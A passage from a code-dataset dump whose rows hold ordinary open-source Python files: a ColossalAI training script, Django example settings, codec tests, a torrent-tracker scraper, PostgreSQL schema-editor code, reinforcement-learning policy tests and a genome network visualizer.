hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d67a7120378a23a8121f142f10a4a3592d027dfb
| 3,812
|
py
|
Python
|
examples/vit_b16_imagenet_data_parallel/train.py
|
xdjiangkai/ColossalAI
|
4a3d3446b04065fa1c89b78cba673e96115c6325
|
[
"Apache-2.0"
] | null | null | null |
examples/vit_b16_imagenet_data_parallel/train.py
|
xdjiangkai/ColossalAI
|
4a3d3446b04065fa1c89b78cba673e96115c6325
|
[
"Apache-2.0"
] | null | null | null |
examples/vit_b16_imagenet_data_parallel/train.py
|
xdjiangkai/ColossalAI
|
4a3d3446b04065fa1c89b78cba673e96115c6325
|
[
"Apache-2.0"
] | 1
|
2022-01-06T17:16:32.000Z
|
2022-01-06T17:16:32.000Z
|
import glob
from math import log
import os
import colossalai
from colossalai.nn.metric import Accuracy
import torch
from colossalai.context import ParallelMode
from colossalai.core import global_context as gpc
from colossalai.logging import get_dist_logger
from colossalai.trainer import Trainer, hooks
from colossalai.nn.lr_scheduler import LinearWarmupLR
from dataloader.imagenet_dali_dataloader import DaliDataloader
from mixup import MixupLoss, MixupAccuracy
from timm.models import vit_base_patch16_224
from myhooks import TotalBatchsizeHook
def build_dali_train():
root = gpc.config.dali.root
train_pat = os.path.join(root, 'train/*')
train_idx_pat = os.path.join(root, 'idx_files/train/*')
return DaliDataloader(
sorted(glob.glob(train_pat)),
sorted(glob.glob(train_idx_pat)),
batch_size=gpc.config.BATCH_SIZE,
shard_id=gpc.get_local_rank(ParallelMode.DATA),
num_shards=gpc.get_world_size(ParallelMode.DATA),
training=True,
gpu_aug=gpc.config.dali.gpu_aug,
cuda=True,
mixup_alpha=gpc.config.dali.mixup_alpha
)
def build_dali_test():
root = gpc.config.dali.root
val_pat = os.path.join(root, 'validation/*')
val_idx_pat = os.path.join(root, 'idx_files/validation/*')
return DaliDataloader(
sorted(glob.glob(val_pat)),
sorted(glob.glob(val_idx_pat)),
batch_size=gpc.config.BATCH_SIZE,
shard_id=gpc.get_local_rank(ParallelMode.DATA),
num_shards=gpc.get_world_size(ParallelMode.DATA),
training=False,
# gpu_aug=gpc.config.dali.gpu_aug,
gpu_aug=False,
cuda=True,
mixup_alpha=gpc.config.dali.mixup_alpha
)
def main():
# initialize distributed setting
parser = colossalai.get_default_parser()
args = parser.parse_args()
# launch from slurm batch job
colossalai.launch_from_slurm(config=args.config,
host=args.host,
port=args.port,
backend=args.backend
)
# launch from torch
# colossalai.launch_from_torch(config=args.config)
# get logger
logger = get_dist_logger()
logger.info("initialized distributed environment", ranks=[0])
# build model
model = vit_base_patch16_224(drop_rate=0.1)
# build dataloader
train_dataloader = build_dali_train()
test_dataloader = build_dali_test()
# build optimizer
optimizer = colossalai.nn.Lamb(model.parameters(), lr=1.8e-2, weight_decay=0.1)
# build loss
criterion = MixupLoss(loss_fn_cls=torch.nn.CrossEntropyLoss)
# lr_scheduelr
lr_scheduler = LinearWarmupLR(optimizer, warmup_steps=50, total_steps=gpc.config.NUM_EPOCHS)
engine, train_dataloader, test_dataloader, _ = colossalai.initialize(
model, optimizer, criterion, train_dataloader, test_dataloader
)
logger.info("initialized colossalai components", ranks=[0])
# build trainer
trainer = Trainer(engine=engine, logger=logger)
# build hooks
hook_list = [
hooks.LossHook(),
hooks.AccuracyHook(accuracy_func=MixupAccuracy()),
hooks.LogMetricByEpochHook(logger),
hooks.LRSchedulerHook(lr_scheduler, by_epoch=True),
TotalBatchsizeHook(),
# comment if you do not need to use the hooks below
hooks.SaveCheckpointHook(interval=1, checkpoint_dir='./ckpt'),
hooks.TensorboardHook(log_dir='./tb_logs', ranks=[0]),
]
# start training
trainer.fit(
train_dataloader=train_dataloader,
test_dataloader=test_dataloader,
epochs=gpc.config.NUM_EPOCHS,
hooks=hook_list,
display_progress=True,
test_interval=1
)
if __name__ == '__main__':
main()
| 31.245902
| 96
| 0.68468
|
0c6613c068ef14a27e8f030bf098763474c480df
| 2,045
|
py
|
Python
|
examples/frameworks/django/djangotest/settings.py
|
ashishmjn/gunicorn
|
d478968d5977073c190d640363a1f822e82c90f6
|
[
"MIT"
] | 3
|
2018-03-06T16:00:45.000Z
|
2019-04-10T10:08:20.000Z
|
examples/frameworks/django/djangotest/settings.py
|
ashishmjn/gunicorn
|
d478968d5977073c190d640363a1f822e82c90f6
|
[
"MIT"
] | null | null | null |
examples/frameworks/django/djangotest/settings.py
|
ashishmjn/gunicorn
|
d478968d5977073c190d640363a1f822e82c90f6
|
[
"MIT"
] | 1
|
2019-10-08T05:51:29.000Z
|
2019-10-08T05:51:29.000Z
|
# Django settings for djangotest project.
import platform
PRODUCTION_MODE = platform.node().startswith('http')
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('benoitc', 'bchesneau@gmail.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
}
}
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = ''
STATIC_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATICFILES_DIRS = (
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
SECRET_KEY = 'c-u@jrg$dy)g7%)=jg)c40d0)4z0b%mltvtu)85l1&*(zwau(f'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
ROOT_URLCONF = 'djangotest.urls'
TEMPLATE_DIRS = ()
SOME_VALUE = "hello world"
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'djangotest.testing',
'gunicorn',
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| 19.47619
| 69
| 0.658191
|
9359564121aaa7bcfc9ac0f0757e671d948f2fa8
| 2,745
|
py
|
Python
|
from_cpython/Lib/test/test_codecencodings_kr.py
|
aisk/pyston
|
ac69cfef0621dbc8901175e84fa2b5cb5781a646
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1
|
2020-02-06T14:28:45.000Z
|
2020-02-06T14:28:45.000Z
|
from_cpython/Lib/test/test_codecencodings_kr.py
|
aisk/pyston
|
ac69cfef0621dbc8901175e84fa2b5cb5781a646
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
from_cpython/Lib/test/test_codecencodings_kr.py
|
aisk/pyston
|
ac69cfef0621dbc8901175e84fa2b5cb5781a646
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1
|
2020-02-06T14:29:00.000Z
|
2020-02-06T14:29:00.000Z
|
# expected: fail
#
# test_codecencodings_kr.py
# Codec encoding tests for ROK encodings.
#
from test import test_support
from test import test_multibytecodec_support
import unittest
class Test_CP949(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'cp949'
tstring = test_multibytecodec_support.load_teststring('cp949')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
)
class Test_EUCKR(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'euc_kr'
tstring = test_multibytecodec_support.load_teststring('euc_kr')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
# composed make-up sequence errors
("\xa4\xd4", "strict", None),
("\xa4\xd4\xa4", "strict", None),
("\xa4\xd4\xa4\xb6", "strict", None),
("\xa4\xd4\xa4\xb6\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4", "strict", u"\uc4d4"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4x", "strict", u"\uc4d4x"),
("a\xa4\xd4\xa4\xb6\xa4", "replace", u"a\ufffd"),
("\xa4\xd4\xa3\xb6\xa4\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa3\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa3\xd4", "strict", None),
("\xa4\xd4\xa4\xff\xa4\xd0\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xff\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xff", "replace", u"\ufffd"),
("\xc1\xc4", "strict", u"\uc894"),
)
class Test_JOHAB(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'johab'
tstring = test_multibytecodec_support.load_teststring('johab')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\ucd27"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\ucd27\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\ucd27"),
)
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
| 39.214286
| 74
| 0.599271
|
9c6fe3d55e85f6641dc5bb3a357ed2a24414d1ac
| 797
|
py
|
Python
|
binarynum.py
|
AndyPham2341/DecimalNumberToBinaryNumber
|
28be6fc4b58de269b44acb20b11c2cb785944aef
|
[
"MIT"
] | null | null | null |
binarynum.py
|
AndyPham2341/DecimalNumberToBinaryNumber
|
28be6fc4b58de269b44acb20b11c2cb785944aef
|
[
"MIT"
] | null | null | null |
binarynum.py
|
AndyPham2341/DecimalNumberToBinaryNumber
|
28be6fc4b58de269b44acb20b11c2cb785944aef
|
[
"MIT"
] | null | null | null |
import sys
#check for two arguments: input file and output file
if(len(sys.argv) != 3):
print("usage: python binarynum.py inputfile outputfile")
quit()
#open the input file and get the numbers
with open(sys.argv[1]) as f:
numbers = [int(x) for x in f]
#print the input number
print("input number {0}".format(numbers))
#open the place to write the file
with open(sys.argv[2],"w") as file:
#loop through number, write decimal numbers as 32 bits
for idx, num in enumerate(numbers):
#convert decimal number to binary number with padding so it's 32 bits
binNum = "{:0>32}".format(bin(num)[2:])
#write to file
file.write(binNum + "\n")
#write to console
print("index{0}: Binary number of {1} is {2}".format(idx,num,binNum))
| 33.208333
| 77
| 0.649937
|
430e67965f07ed482108510eea49284b731f0b2a
| 837
|
py
|
Python
|
test/testTorchAttention.py
|
quyuanhang/match_in_chat_torch
|
36242c01b99c6ab0001a6084dbbdead6dae770d6
|
[
"Unlicense"
] | null | null | null |
test/testTorchAttention.py
|
quyuanhang/match_in_chat_torch
|
36242c01b99c6ab0001a6084dbbdead6dae770d6
|
[
"Unlicense"
] | null | null | null |
test/testTorchAttention.py
|
quyuanhang/match_in_chat_torch
|
36242c01b99c6ab0001a6084dbbdead6dae770d6
|
[
"Unlicense"
] | null | null | null |
import torch
import numpy as np
import sys
sys.path.append('../')
from networks.torchCNN import TextCNN
from networks.torchAttention import Attention
if __name__ == '__main__':
data1 = np.random.randint(200, size=[10, 25, 50])
data2 = np.random.randint(200, size=[10, 25, 50])
for i in range(1, 10):
data1[i, -i:, :] = 0
data1[i, :, -i:] = 0
X1 = torch.LongTensor(data1)
X2 = torch.LongTensor(data2)
cnn1 = TextCNN(200, 100, 25, 50)
Y1 = cnn1.forward(X1)
cnn2 = TextCNN(200, 100, 25, 50)
Y2 = cnn2.forward(X2)
attention = Attention(25)
inf_mask, zero_mask = attention.get_masks(data1, data2)
INF_MASK = torch.FloatTensor(inf_mask)
ZERO_MASK = torch.FloatTensor(zero_mask)
out1, out2 = attention.forward(Y1, Y2, INF_MASK, ZERO_MASK)
print(out2.shape)
| 23.25
| 63
| 0.647551
|
6ed7e6f43ed0d4cdefd36412ebbb657e29264f44
| 3,060
|
py
|
Python
|
torrt/trackers/anidub.py
|
st7105/torrt
|
97a3cb20a8caec5bba2132543343a82eb13aa182
|
[
"BSD-3-Clause"
] | 82
|
2015-04-12T08:36:53.000Z
|
2022-01-17T07:51:42.000Z
|
torrt/trackers/anidub.py
|
st7105/torrt
|
97a3cb20a8caec5bba2132543343a82eb13aa182
|
[
"BSD-3-Clause"
] | 79
|
2015-04-12T08:35:59.000Z
|
2022-02-10T12:05:26.000Z
|
torrt/trackers/anidub.py
|
st7105/torrt
|
97a3cb20a8caec5bba2132543343a82eb13aa182
|
[
"BSD-3-Clause"
] | 26
|
2015-01-13T17:49:07.000Z
|
2021-07-20T10:02:46.000Z
|
from typing import List
from ..base_tracker import GenericPrivateTracker
class AniDUBTracker(GenericPrivateTracker):
"""This class implements .torrent files downloads for http://tr.anidub.com tracker."""
alias: str = 'tr.anidub.com'
login_url: str = 'https://%(domain)s/'
auth_cookie_name: str = 'dle_user_id'
def __init__(
self,
username: str = None,
password: str = None,
cookies: dict = None,
query_string: str = None,
quality_prefs: List[str] = None
):
super(AniDUBTracker, self).__init__(
username=username, password=password, cookies=cookies, query_string=query_string
)
if quality_prefs is None:
quality_prefs = ['bd720', 'tv720', 'dvd480', 'hwp', 'psp']
self.quality_prefs = quality_prefs
def get_login_form_data(self, login: str, password: str) -> dict:
return {'login_name': login, 'login_password': password, 'login': 'submit'}
def get_download_link(self, url: str) -> str:
"""Tries to find .torrent file download link at forum thread page and return that one."""
download_link = ''
page_soup = self.get_torrent_page(url)
if page_soup.select('form input[name="login"]'):
self.log_debug('Login is required to download torrent file.')
domain = self.extract_domain(url)
if self.login(domain):
download_link = self.get_download_link(url)
else:
available_qualities = []
quality_divs = page_soup.select('div.torrent > div.torrent_c > div')
for quality_div in quality_divs:
available_qualities.append(quality_div['id'])
self.log_debug(f"Available in qualities: {', '.join(available_qualities)}")
if available_qualities:
preferred_qualities = [
quality
for quality in self.quality_prefs
if quality in available_qualities
]
if not preferred_qualities:
self.log_debug(
"Torrent is not available in preferred qualities: "
f"{', '.join(self.quality_prefs)}")
else:
target_quality = preferred_qualities[0]
self.log_debug(f'Trying to get torrent in `{target_quality}` quality ...')
target_links = page_soup.select(f'div#{target_quality} div.torrent_h a')
if target_links:
if isinstance(target_links, list):
download_link = target_links[0]['href']
else:
download_link = target_links['href']
download_link = self.expand_link(url, download_link)
else:
self.log_debug(f'Unable to find a link for `{target_quality}` quality')
return download_link
| 32.210526
| 97
| 0.563399
|
3e1cc7cc8a0fb50b28e7c8152be5daa85bbee45a
| 744
|
py
|
Python
|
app/async_mode.py
|
ju1115kr/afoccert
|
d0278e36ed49305b9ea69b1ca614a058a1bc0658
|
[
"MIT"
] | 10
|
2017-09-23T05:08:25.000Z
|
2021-01-06T05:21:40.000Z
|
server/app/async_mode.py
|
ju1115kr/hash-brown
|
93c5e636404608c7cba889cc9f9e0f3d3d0723b2
|
[
"Apache-2.0"
] | 9
|
2018-06-27T10:29:37.000Z
|
2021-12-13T19:48:39.000Z
|
server/app/async_mode.py
|
ju1115kr/tell-your-story
|
dedd084734c4bc47ece16c08e44ab5e8accc8395
|
[
"Apache-2.0"
] | 2
|
2018-07-04T16:54:20.000Z
|
2018-07-04T16:58:36.000Z
|
#!/usr/bin/env python
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
| 23.25
| 78
| 0.646505
|
8d4db4ea1c3a98f244d776622113a0984123e087
| 6,168
|
py
|
Python
|
django/db/backends/postgresql/schema.py
|
andreip/django
|
c61d1361d027a729d07d277879950ff133c19f4c
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 1
|
2021-02-14T13:02:28.000Z
|
2021-02-14T13:02:28.000Z
|
django/db/backends/postgresql/schema.py
|
andreip/django
|
c61d1361d027a729d07d277879950ff133c19f4c
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
django/db/backends/postgresql/schema.py
|
andreip/django
|
c61d1361d027a729d07d277879950ff133c19f4c
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
import psycopg2
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_alter_column_type = "ALTER COLUMN %(column)s TYPE %(type)s USING %(column)s::%(type)s"
sql_create_sequence = "CREATE SEQUENCE %(sequence)s"
sql_delete_sequence = "DROP SEQUENCE IF EXISTS %(sequence)s CASCADE"
sql_set_sequence_max = "SELECT setval('%(sequence)s', MAX(%(column)s)) FROM %(table)s"
sql_create_index = "CREATE INDEX %(name)s ON %(table)s%(using)s (%(columns)s)%(extra)s"
sql_create_varchar_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s varchar_pattern_ops)%(extra)s"
sql_create_text_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s text_pattern_ops)%(extra)s"
sql_delete_index = "DROP INDEX IF EXISTS %(name)s"
# Setting the constraint to IMMEDIATE runs any deferred checks to allow
# dropping it in the same transaction.
sql_delete_fk = "SET CONSTRAINTS %(name)s IMMEDIATE; ALTER TABLE %(table)s DROP CONSTRAINT %(name)s"
def quote_value(self, value):
return psycopg2.extensions.adapt(value)
def _field_indexes_sql(self, model, field):
output = super()._field_indexes_sql(model, field)
like_index_statement = self._create_like_index_sql(model, field)
if like_index_statement is not None:
output.append(like_index_statement)
return output
def _create_like_index_sql(self, model, field):
"""
Return the statement to create an index with varchar operator pattern
when the column type is 'varchar' or 'text', otherwise return None.
"""
db_type = field.db_type(connection=self.connection)
if db_type is not None and (field.db_index or field.unique):
# Fields with database column types of `varchar` and `text` need
# a second index that specifies their operator class, which is
# needed when performing correct LIKE queries outside the
# C locale. See #12234.
#
# The same doesn't apply to array fields such as varchar[size]
# and text[size], so skip them.
if '[' in db_type:
return None
if db_type.startswith('varchar'):
return self._create_index_sql(model, [field], suffix='_like', sql=self.sql_create_varchar_index)
elif db_type.startswith('text'):
return self._create_index_sql(model, [field], suffix='_like', sql=self.sql_create_text_index)
return None
def _alter_column_type_sql(self, table, old_field, new_field, new_type):
"""Make ALTER TYPE with SERIAL make sense."""
if new_type.lower() in ("serial", "bigserial"):
column = new_field.column
sequence_name = "%s_%s_seq" % (table, column)
col_type = "integer" if new_type.lower() == "serial" else "bigint"
return (
(
self.sql_alter_column_type % {
"column": self.quote_name(column),
"type": col_type,
},
[],
),
[
(
self.sql_delete_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_create_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_alter_column % {
"table": self.quote_name(table),
"changes": self.sql_alter_column_default % {
"column": self.quote_name(column),
"default": "nextval('%s')" % self.quote_name(sequence_name),
}
},
[],
),
(
self.sql_set_sequence_max % {
"table": self.quote_name(table),
"column": self.quote_name(column),
"sequence": self.quote_name(sequence_name),
},
[],
),
],
)
else:
return super()._alter_column_type_sql(table, old_field, new_field, new_type)
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
# Drop indexes on varchar/text columns that are changing to a different
# type.
if (old_field.db_index or old_field.unique) and (
(old_type.startswith('varchar') and not new_type.startswith('varchar')) or
(old_type.startswith('text') and not new_type.startswith('text'))
):
index_name = self._create_index_name(model, [old_field.column], suffix='_like')
self.execute(self._delete_constraint_sql(self.sql_delete_index, model, index_name))
super()._alter_field(
model, old_field, new_field, old_type, new_type, old_db_params,
new_db_params, strict,
)
# Added an index? Create any PostgreSQL-specific indexes.
if ((not (old_field.db_index or old_field.unique) and new_field.db_index) or
(not old_field.unique and new_field.unique)):
like_index_statement = self._create_like_index_sql(model, new_field)
if like_index_statement is not None:
self.execute(like_index_statement)
# Removed an index? Drop any PostgreSQL-specific indexes.
if old_field.unique and not (new_field.db_index or new_field.unique):
index_to_remove = self._create_index_name(model, [old_field.column], suffix='_like')
self.execute(self._delete_constraint_sql(self.sql_delete_index, model, index_to_remove))
| 47.083969
| 112
| 0.568256
|
8c67a224b3633b92644c835f4d18910d870816c4
| 2,972
|
py
|
Python
|
tests/softlearning/policies/uniform_policy_test.py
|
brickerino/tqc
|
b449f483871eb9972a168d9338e84399778d36cd
|
[
"MIT"
] | 362
|
2019-04-16T22:45:21.000Z
|
2022-03-30T06:13:22.000Z
|
tests/softlearning/policies/uniform_policy_test.py
|
brickerino/tqc
|
b449f483871eb9972a168d9338e84399778d36cd
|
[
"MIT"
] | 39
|
2019-05-03T04:21:14.000Z
|
2022-03-11T23:45:03.000Z
|
tests/softlearning/policies/uniform_policy_test.py
|
brickerino/tqc
|
b449f483871eb9972a168d9338e84399778d36cd
|
[
"MIT"
] | 67
|
2019-04-17T03:35:29.000Z
|
2021-12-26T05:39:37.000Z
|
from collections import OrderedDict
import pickle
import numpy as np
import tensorflow as tf
import gym
from softlearning.policies.uniform_policy import UniformPolicy
class UniformPolicyTest(tf.test.TestCase):
def setUp(self):
self.env = gym.envs.make('Swimmer-v3')
self.policy = UniformPolicy(
input_shapes=(self.env.observation_space.shape, ),
output_shape=self.env.action_space.shape)
def test_actions_and_log_pis_symbolic(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
observations_tf = tf.constant(observations_np, dtype=tf.float32)
actions = self.policy.actions([observations_tf])
log_pis = self.policy.log_pis([observations_tf], actions)
self.assertEqual(actions.shape, (2, *self.env.action_space.shape))
self.assertEqual(log_pis.shape, (2, 1))
self.evaluate(tf.global_variables_initializer())
actions_np = self.evaluate(actions)
log_pis_np = self.evaluate(log_pis)
self.assertEqual(actions_np.shape, (2, *self.env.action_space.shape))
self.assertEqual(log_pis_np.shape, (2, 1))
def test_actions_and_log_pis_numeric(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
actions_np = self.policy.actions_np([observations_np])
log_pis_np = self.policy.log_pis_np([observations_np], actions_np)
self.assertEqual(actions_np.shape, (2, *self.env.action_space.shape))
self.assertEqual(log_pis_np.shape, (2, 1))
def test_env_step_with_actions(self):
observation1_np = self.env.reset()
action = self.policy.actions_np(observation1_np[None])[0, ...]
self.env.step(action)
def test_trainable_variables(self):
self.assertEqual(len(self.policy.trainable_variables), 0)
def test_get_diagnostics(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
diagnostics = self.policy.get_diagnostics([observations_np])
self.assertTrue(isinstance(diagnostics, OrderedDict))
self.assertFalse(diagnostics)
def test_serialize_deserialize(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
deserialized = pickle.loads(pickle.dumps(self.policy))
np.testing.assert_equal(
self.policy.actions_np([observations_np]).shape,
deserialized.actions_np([observations_np]).shape)
if __name__ == '__main__':
tf.test.main()
| 36.691358
| 77
| 0.698856
|
3e6321daf064d5c29fa7ee8c884c39a5a3c6d672
| 4,484
|
py
|
Python
|
population/utils/visualizing/genome_visualizer.py
|
RubenPants/RobotSimulator2D
|
334d7b9cab0edb22d4670cfaf39fbed76c351758
|
[
"MIT"
] | null | null | null |
population/utils/visualizing/genome_visualizer.py
|
RubenPants/RobotSimulator2D
|
334d7b9cab0edb22d4670cfaf39fbed76c351758
|
[
"MIT"
] | null | null | null |
population/utils/visualizing/genome_visualizer.py
|
RubenPants/RobotSimulator2D
|
334d7b9cab0edb22d4670cfaf39fbed76c351758
|
[
"MIT"
] | null | null | null |
"""
visualizer.py
Create visualizations for the genomes present in the population.
"""
import os
import sys
from graphviz import Digraph
from configs.genome_config import GenomeConfig
from population.utils.genome_util.genes import GruNodeGene, SimpleNodeGene
from population.utils.genome_util.genome import Genome
from population.utils.network_util.graphs import required_for_output
# Add graphviz to path if on Windows
if sys.platform == 'win32': os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
def draw_net(config: GenomeConfig, genome: Genome, debug=False, filename=None, view=True):
"""
Visualize the structure of one genome.
:param config: Configuration of the network
:param genome: Genome (network) that will be visualized
:param debug: Add excessive information to the drawing
:param filename: Name of the file
:param view: Visualize when method is run
"""
# Assign names to sensors (hard-coded since immutable)
node_names = dict()
node_names.update(genome.robot_snapshot)
node_names[0] = 'left wheel'
node_names[1] = 'right wheel'
num_inputs = len(genome.robot_snapshot)
# Visualizer specific functionality
node_colors = dict()
dot = Digraph(format='png', engine="fdp")
dot.attr(overlap='false')
# Get the used hidden nodes and all used connections
used_inp_nodes, used_hid_nodes, used_outp_nodes, used_conn = required_for_output(
inputs=set(config.keys_input),
outputs=set(config.keys_output),
connections=genome.connections
)
# Visualize input nodes
inputs = set()
active = {a for (a, b) in used_conn if a < 0}
for index, key in enumerate(config.keys_input):
inputs.add(key)
name = node_names.get(key)
color = '#e3e3e3' if key in active else '#9e9e9e'
if debug or key in active:
dot.node(
name,
style='filled',
shape='box',
fillcolor=node_colors.get(key, color),
pos=f"{index * 20},0!"
)
# Visualize output nodes
outputs = set()
for index, key in enumerate(config.keys_output):
outputs.add(key)
name = node_names[key]
if debug:
name += f'\nactivation={genome.nodes[key].activation}'
name += f'\nbias={round(genome.nodes[key].bias, 2)}'
node_names.update({key: name})
dot.node(
name,
style='filled',
shape='box',
fillcolor=node_colors.get(key, '#bdc5ff'),
pos=f"{(num_inputs - 5) * 10 + index * 100}, "
f"{200 + len(used_hid_nodes) * (50 if debug else 20)}!",
)
# Visualize hidden nodes
for key in sorted(used_hid_nodes):
assert (key not in inputs) and (key not in outputs)
fillcolor = 'white' if type(genome.nodes[key]) == SimpleNodeGene else '#f5c484' # fancy orange
if debug:
if type(genome.nodes[key]) == GruNodeGene:
genome.update_gru_nodes(config)
name = str(genome.nodes[key])
else:
name = str(key)
node_names.update({key: name})
dot.node(
name,
style='filled',
shape='box',
fillcolor=node_colors.get(key, fillcolor),
)
# Add inputs to used_nodes (i.e. all inputs will always be visualized, even if they aren't used!)
used_nodes = (used_inp_nodes | used_hid_nodes | used_outp_nodes)
# Visualize connections
for cg in used_conn.values():
sending_node, receiving_node = cg.key
if sending_node in used_nodes and receiving_node in used_nodes:
color = 'green' if cg.weight > 0 else 'red'
width = str(0.1 + abs(cg.weight) / config.weight_max_value * 5)
dot.edge(
node_names.get(sending_node),
node_names.get(receiving_node),
label=str(round(cg.weight, 2)) if debug else None,
color=color,
penwidth=width,
)
# Render, save (and show if on Windows)
if sys.platform == 'win32':
dot.render(filename, view=view)
else:
dot.render(filename, view=False)
# Remove graphviz file created during rendering
os.remove(filename)
| 35.587302
| 105
| 0.599688
|
2d32277f6d25d88937e6983c8ed7e6a7a25bdbff
| 595
|
py
|
Python
|
main.py
|
HenryFleming/cmd-lang
|
f98b34a8d79cdc92e91531b82b183176118faf25
|
[
"MIT"
] | null | null | null |
main.py
|
HenryFleming/cmd-lang
|
f98b34a8d79cdc92e91531b82b183176118faf25
|
[
